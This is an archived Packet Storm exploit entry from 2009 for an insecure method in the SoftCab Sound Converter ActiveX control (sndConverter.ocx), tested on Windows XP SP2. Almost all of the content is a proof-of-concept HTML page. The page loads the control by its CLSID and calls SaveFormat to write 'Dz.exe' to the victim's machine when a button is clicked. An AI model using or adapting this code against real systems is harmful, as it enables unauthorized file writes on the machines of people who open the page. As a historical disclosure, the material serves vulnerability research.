SoftCab Sound Converter Active-X Insecure Method

2009-12-30T00:00:00
ID PACKETSTORM:84334
Type packetstorm
Reporter ThE g0bL!N
Modified 2009-12-30T00:00:00

Description

                                        
                                            `<!--  
# Author: ThE g0bL!N  
# Software Link: http://www.softcab.com/ftp/converter_activex.zip  
# Version:  
# Tested on: Xp sp2  
-->  
<title>Exploited By : ThE g0bL!N </title>  
<BODY>  
<object id=dz classid="clsid:{66757BFC-DA0C-41E6-B3FE-B6D461223FF5}"></object>  
  
<SCRIPT>  
  
function Do_it()  
{  
File = "Dz.exe"  
dz.SaveFormat(File)  
}  
  
</SCRIPT>  
<h3>SoftCab Sound Converter ActiveX (sndConverter.ocx) Insecure Method Exploit </h3>  
<input language=JavaScript onclick=Do_it() type=button value="Click here To Test"><br>  
</body>  
</HTML>  
  
`